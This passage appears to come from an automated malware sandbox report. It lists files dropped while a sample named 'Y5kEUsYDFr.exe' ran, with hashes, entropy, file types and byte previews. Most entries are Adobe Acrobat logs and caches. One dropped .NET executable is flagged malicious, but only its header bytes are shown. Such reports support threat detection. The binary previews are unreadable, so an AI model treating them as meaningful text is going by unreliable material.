                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):1969
                                                Entropy (8bit):5.0470967544303305
                                                Encrypted:false
                                                SSDEEP:48:Y62sSbMSlMtCM5mMOpiMAW0MretMSMmkaMY:4tYtt55V6AWLre6JmkhY
                                                MD5:C01BB431919B73D0FCE5A4504275F362
                                                SHA1:756C37C8CE49A33BF70B5EAFDF0BA1E348FC87D9
                                                SHA-256:8B6B36A674CEF60FB0EC1C3A0FC580DA44AA9949F8D376BF6013FCECE82E60EA
                                                SHA-512:BFC69A412273E5B05DD240EECD4C478B5409A6054C6C8C34A46E71A82F2F18BEDCE771C272DD3896A28C10081D4B39EDE3510629D041F8EE173E4779619B190C
                                                Malicious:false
                                                Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1733724281000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"23c88c8acf166d9fda5ae4d83df3db72","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696420889000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d5fa85f4cf271b5fa75367efd1b392fa","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696420884000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c3af48ba3dee086edbbf20dff46c7ee0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696333862000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7101e009d8bf8920d0a3dd3f5dc75ebc","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696333862000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"8558394a527c224775253e57d0e3596a","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1230,"ts":1696333862000},{"id":"DC_Reader_RHP_Banner","info":{"dg":
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):1.187441781567585
                                                Encrypted:false
                                                SSDEEP:48:TGufl2GL7msEHUUUUUUUU5nSvR9H9vxFGiDIAEkGVvpFH:lNVmswUUUUUUUU5n+FGSIt5H
                                                MD5:5E4D192D65909E747EF421EECF485240
                                                SHA1:804B55FFB3E10948A484D3E0E19C53D9B5CF9079
                                                SHA-256:31DBA3FB532827B6D37AB6C23D62FAB2307F40347CB31FD5D06F579D3849D375
                                                SHA-512:D584D8AF944B723FB55B9545AE6D8F991752CBF2BB7BFAFE495AD5C555B178907087093C73C098B70D5F1B7C5F242D2411D1CBD922BF4661FB083DC1CFDE3DC6
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:SQLite Rollback Journal
                                                Category:dropped
                                                Size (bytes):8720
                                                Entropy (8bit):1.6074402971898196
                                                Encrypted:false
                                                SSDEEP:48:7McKUUUUUUUUUU57vR9H9vxFGiDIAEkGVvEfqFl2GL7msB:74UUUUUUUUUU5LFGSItSfKVmsB
                                                MD5:8B0C23872C81F71BB58538AA44A7D06A
                                                SHA1:D44A036A5816A3FB82D595540484B112C84F5B83
                                                SHA-256:1F9D183D853AE6ECFC74EF1DEAB32628F5DE3D8891A51403671F6F35F711E3A7
                                                SHA-512:CB806951E97F24E3EF4DBBD5F006F86AF76D74E7138408151775F50E2A809AAFB1EB75251957CDD6A24ED9C8F711A9C9259020FAE6CB7B7AFCC7B294A7817559
                                                Malicious:false
                                                Preview:.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):66726
                                                Entropy (8bit):5.392739213842091
                                                Encrypted:false
                                                SSDEEP:768:RNOpblrU6TBH44ADKZEgablQ9WY0oQhFZ7EdOKnYBenlvYyu:6a6TZ44ADEabO9WYohFZzelvK
                                                MD5:BAE2A73B3683EEAA3FCAAA9915A73C2E
                                                SHA1:68327FE03B11F9FE7F217308B3531F03074F2367
                                                SHA-256:6CDDFBAAA66947E798D6FFEF3B5BFD050FE6F9DE7C6ABEA74B87EA905AD71F75
                                                SHA-512:B33647324966FD41B75AE89FFE918EE76605C93B251E347E8CF9CC22BA2D1EAF49BF96629C871528069F66EE7C40E33D31203290E748ABEB94D1BE20C63AA79C
                                                Malicious:false
                                                Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):246
                                                Entropy (8bit):3.5193370621730837
                                                Encrypted:false
                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88hlAiwlN1rCH:Qw946cPbiOxDlbYnuRKrYf1U
                                                MD5:13B87891961A07A9CD5AEDD6069D3728
                                                SHA1:81FDDEF7F5BE87DEAAD29500C6DE28D81658C6B2
                                                SHA-256:34A1D9C7DD52EDECC90991688A56BCBD376C51E87C6CAB14AE9ACADC6AD127FC
                                                SHA-512:689D72EAA2EEB1A1AB3CCD0FF0797549FA6B43F547EBBC153DDB2794359AF66353A5E315D740102163C270149A3EE66546DAD137D09F538C21B846449CBFC754
                                                Malicious:false
                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.9./.1.2./.2.0.2.4. . .0.1.:.0.5.:.2.3. .=.=.=.....
                                                Process:C:\Users\user\Desktop\Y5kEUsYDFr.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (302), with no line terminators
                                                Category:dropped
                                                Size (bytes):305
                                                Entropy (8bit):4.857483719766813
                                                Encrypted:false
                                                SSDEEP:6:JiMVBdDmUifoPWzcJ7RexJOG0XIQsJyLAxJmJBJ4lpAxJuhwc:MMHdD6fY4cufsXIQslfEgAfHc
                                                MD5:B9C3AE0E82195B170FEA8976D2EAFF22
                                                SHA1:4EBC61D576E45E7FA118EB909189B34FEE42791D
                                                SHA-256:14DEC7D1C20FC426AD5463D1B658F87A22F7E576BA4A08905CAF399551813A72
                                                SHA-512:AD82F54D5DBD951CC7F9B24D90A87DFDF1E1E839AA0C92DE7A813BA09BFF66F309274384275D0F38C7990A511EC2363341C516556230ED81D97EA62569A326EB
                                                Malicious:false
                                                Preview:.<?xml version="1.0" encoding="utf-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="dll" ContentType="application/octet-stream" /><Default Extension="pkgdef" ContentType="text/plain" /><Default Extension="vsixmanifest" ContentType="text/xml" /></Types>
                                                Process:C:\Users\user\Desktop\Y5kEUsYDFr.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):550912
                                                Entropy (8bit):7.713690387908805
                                                Encrypted:false
                                                SSDEEP:6144:eVtna0OB1sZqP+jPVtSfj+Bv/pvteHwxBBBvYfrZcE0X+VkV/M0wZSca7ForfYEd:E5f0+B3pUHwpJYTcOSV5suQeEFHncyQ
                                                MD5:09929B04B0C29E2722009F49FAF7183C
                                                SHA1:8FBACCD01E2F6E3213140402766B90E0409C92BE
                                                SHA-256:2AA22D6CD757C6E46D10FD8DB264481C299FF4646F2698C7A1976384D7C20EE2
                                                SHA-512:CC9728AF886B748119AE2BEDE4B7E9FF5F2245EEA3D1B9034E943D33A060D78E0191B8DF1B80E5E01F666B0DE6473C5D846CB446D7F83925BD83FBA5BE9D091B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 34%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..~............... ........@.. ....................... ............`.....................................(....................................................................................`.................H............text....|... ...................... ..`.|]Y................................ ..`.z~z.........`......................@....%?T.....X.......Z.................. ..`.rsrc................`..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:ASCII text, with very long lines (393)
                                                Category:dropped
                                                Size (bytes):16525
                                                Entropy (8bit):5.345946398610936
                                                Encrypted:false
                                                SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                Malicious:false
                                                Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):15110
                                                Entropy (8bit):5.34439448979523
                                                Encrypted:false
                                                SSDEEP:384:fr96lrQRCzOY6dGj1bxYgyzKmlcN7S29bMFJDnTCvRl9/PjOuphT8b8hAjBf4JR8:BRx
                                                MD5:2F0D5120C157C3D04020BAE9EBB40621
                                                SHA1:3FFBC800F05811ADADDFF800841CDB0FB0CF1AFD
                                                SHA-256:3920A3D7F87EBA513DD1F689356B237C70EA58118EED19BB8AAAAA7E73EC937D
                                                SHA-512:D53C6EEBE3AD6709F782C71E2528D439BD869EBC0AD6FC307C4C82DF4427BF55BBF877D118EBFC6EA1EA4C9D5FC264625044A2181BA7928A201D038942E52321
                                                Malicious:false
                                                Preview:SessionID=bcb587ae-1c8e-4c6c-a185-fb487858f1e4.1733724281170 Timestamp=2024-12-09T01:04:41:170-0500 ThreadID=3520 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=bcb587ae-1c8e-4c6c-a185-fb487858f1e4.1733724281170 Timestamp=2024-12-09T01:04:41:177-0500 ThreadID=3520 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=bcb587ae-1c8e-4c6c-a185-fb487858f1e4.1733724281170 Timestamp=2024-12-09T01:04:41:177-0500 ThreadID=3520 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=bcb587ae-1c8e-4c6c-a185-fb487858f1e4.1733724281170 Timestamp=2024-12-09T01:04:41:177-0500 ThreadID=3520 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=bcb587ae-1c8e-4c6c-a185-fb487858f1e4.1733724281170 Timestamp=2024-12-09T01:04:41:177-0500 ThreadID=3520 Component=ngl-lib_NglAppLib Description="SetConf
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):29752
                                                Entropy (8bit):5.388982408897857
                                                Encrypted:false
                                                SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rR:a3p4AmaaUv9iZ
                                                MD5:55EF1E942BC78C7EE02194EE61DF929D
                                                SHA1:3B82E0670B2CCD4D7AB5217C33B7F98F0487AE5D
                                                SHA-256:91401E30B1B884272C4AD007517ABF96D8D7A0A0DCAAB5A981202F981A344996
                                                SHA-512:69F92EF43A8A56105639188AD6F23821308F20812169DC3C050D9F5E4095D030AD9584124EBEA4C5065CB030DD3074C153D8A337C4D5FD3A45C50DD625E8CDCD
                                                Malicious:false
                                                Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                Category:dropped
                                                Size (bytes):1407294
                                                Entropy (8bit):7.97605879016224
                                                Encrypted:false
                                                SSDEEP:24576:eIowYIGNPnbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oBGZd:UwZGNb3mlind9i4ufFXpAXkrfUs0qWLa
                                                MD5:DD5E646E5A339DEA766F301A1768A03D
                                                SHA1:C2FC502E4D0563D50F3A32F583C4E353F504FDC9
                                                SHA-256:2EEE2EE4A1201AEC0D19B1B961BFFA3AF0BE80D9A8320684847DDA4451AFF5F7
                                                SHA-512:E2A03E11E27C3CBC3E186FB29175A6F037CDEDBE17CAEA38F13575A5EE7A18574152A77E2E4A4AFD53613001035A1B76BB7194F292E4B8B5BE4275981480D408
                                                Malicious:false
                                                Preview:...........]..8.}. .)."{g.-.}plw.A........,..Y.tI.g.....)Q.H..'p#p`.U.S.H.)....e....a.><..w.....Dw..9.0Y~.......1.._......j.....Oh.q.\,....tn.....w..i.f..?A../.h.D..........n^......M..w......C....!..4.........w4q..F.1I.!A....(.........TN..'8...Q.........^...za..0Hm/.....{.....\....' ..1..0.qzD........'Y...... .m..8Bh... ...4...z..}.9..Lqp..M \Xe......Q..0..+C.B.4Ijm...o..co..q.d.~.8...\/.4.]....8...1.].D....K.|...hp\..... .ch.....\.g..Qpf.{N....n<......'.....KS(.k..$Q.R...6..'.....7.!....{.....b....C.v~...x...FO^..O.d.>'>...........&.. ..WR...6...^.D..A...d1|..F.g..g;.\...m..V..0..le.......4J..p.(..l'.....n_........n.0..P...Y.KJ.S.B.><.\C.}..~....,..k..V....XI#w..B..Q.B...t..\.lB;&!.n.(._=..>...+..a.......N.X{.{..ly.$V......@..E.....R.j.x[..V.....Ij.....mQ....-D....U1..J...F+.%...6.g.T.....X....(...w...8a..\1..^z.6...@R....l.i.A..,.......o..~^bM.E..qW^?.......!..)u.(&*.v....."c.H..Pp..uy...DP8.m3.:T..U=............0-~.B..w...D..'
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                Category:dropped
                                                Size (bytes):386528
                                                Entropy (8bit):7.9736851559892425
                                                Encrypted:false
                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                Malicious:false
                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                Category:dropped
                                                Size (bytes):758601
                                                Entropy (8bit):7.98639316555857
                                                Encrypted:false
                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                MD5:3A49135134665364308390AC398006F1
                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                Malicious:false
                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                Category:dropped
                                                Size (bytes):386528
                                                Entropy (8bit):7.9736851559892425
                                                Encrypted:false
                                                SSDEEP:6144:rBgI81ReWQ53+sQ3POSTJJJJEQ6T9UkRm1XX/FLYVbxrr/IxktOQZ1mau4yBwsOo:r+Tegs6lTJJJJv+9UZd1ybxrr/IxkB1m
                                                MD5:774036904FF86EB19FCE18B796528E1E
                                                SHA1:2BA0EBF3FC7BEF9EF5BFAD32070BD3C785904E16
                                                SHA-256:D2FC8EA3DDD3F095F7A469927179B408102471627C91275EDB4D7356F8E453AD
                                                SHA-512:9E9662EA15AE3345166C1E51235CDCE3123B27848E4A4651CC4D2173BDD973E4AD2F8994EFF34A221A9F07AA676F52BEB6D90FF374F6CCB0D06FA39C3EFE6B31
                                                Malicious:false
                                                Preview:...........[l\[.......p.a$..$.K...&%J.J...Wuo..dI.vk4.E..P.u..(.....1.I....A...............0.....$ctg.H.'....@.Zk...~.s.A]M.A..:g?.^{...cjL...X..#.Q{......z...m...K.U]-..^V.........@..P...U.R..z.......?......]nG..O{..n........y...v7...~C#..O.z...:...H&..6M;........c..#.y4u.~6.?...V?.%?SW.....K...[..`N.i.1..:..@?i.Q..O...`.....m.!y.{...?=.. .....Zk......%.6......o<.....yA}......no......u,.....U...a.......[S.n..`.....:...1......X..u.u...`..B=.&M.y..s.....}.i..l.'u]. ...6.s`....zdN.F.>;.d%D..}3..b..~..k.......,hl.j..._...F..p.z..o...C..,.Ss.u.Xd..a.Y.{.p...?.k..t,&..'...........^.f.hg....y..Y...i..m....<..^......yK.......;.5...E...K..Q.;k..|;..B.{m..eS..>b..>...6...wmC.i.....wv..k..{..X...RB.P..?w......1l.H..{{.`g.P.8.Z..v_.G.....f.%+z.....p.P..u}.T.....~r]..W7..._..c.k.....@....y.K...uOSj........^....B..]..~{..;...c....r.J.m.S.}.....k....u*^...5./...{......3.I.p.t...V..........W-..|.K.N.....n.........Bl...#)..;..4.x.....'....A....x..
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                Category:dropped
                                                Size (bytes):758601
                                                Entropy (8bit):7.98639316555857
                                                Encrypted:false
                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                MD5:3A49135134665364308390AC398006F1
                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                Malicious:false
                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                Category:dropped
                                                Size (bytes):1419751
                                                Entropy (8bit):7.976496077007677
                                                Encrypted:false
                                                SSDEEP:24576:ZtwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:fwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                MD5:971F33F2204A29A9601BD391856AD580
                                                SHA1:EFDE508CA80123F69E881A0CDEDEFC4B4713B04F
                                                SHA-256:06390D0A44CF3C02ED7D30A7985F83CC6059CC0302F02DC30E78FD711A2C7119
                                                SHA-512:CA3B3FABE111B201ECF4B23596BE7EACCB2405ECA3415658293CE8B0AF97286E4FEDE85E8511679D49124DCCF9D5C020B05A4E6C20C281ED1D8BEC0EABDF620F
                                                Malicious:false
                                                Preview:...........]..8.}. .)."{g.-.}plw.A........,..Y.tI.g.....)Q.H..'p#p`.U.S.H.)....e....a.><..w.....Dw..9.0Y~.......1.._......j.....Oh.q.\,....tn.....w..i.f..?A../.h.D..........n^......M..w......C....!..4.........w4q..F.1I.!A....(.........TN..'8...Q.........^...za..0Hm/.....{.....\....' ..1..0.qzD........'Y...... .m..8Bh... ...4...z..}.9..Lqp..M \Xe......Q..0..+C.B.4Ijm...o..co..q.d.~.8...\/.4.]....8...1.].D....K.|...hp\..... .ch.....\.g..Qpf.{N....n<......'.....KS(.k..$Q.R...6..'.....7.!....{.....b....C.v~...x...FO^..O.d.>'>...........&.. ..WR...6...^.D..A...d1|..F.g..g;.\...m..V..0..le.......4J..p.(..l'.....n_........n.0..P...Y.KJ.S.B.><.\C.}..~....,..k..V....XI#w..B..Q.B...t..\.lB;&!.n.(._=..>...+..a.......N.X{.{..ly.$V......@..E.....R.j.x[..V.....Ij.....mQ....-D....U1..J...F+.%...6.g.T.....X....(...w...8a..\1..^z.6...@R....l.i.A..,.......o..~^bM.E..qW^?.......!..)u.(&*.v....."c.H..Pp..uy...DP8.m3.:T..U=............0-~.B..w...D..'
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                Category:dropped
                                                Size (bytes):758601
                                                Entropy (8bit):7.98639316555857
                                                Encrypted:false
                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                MD5:3A49135134665364308390AC398006F1
                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                Malicious:false
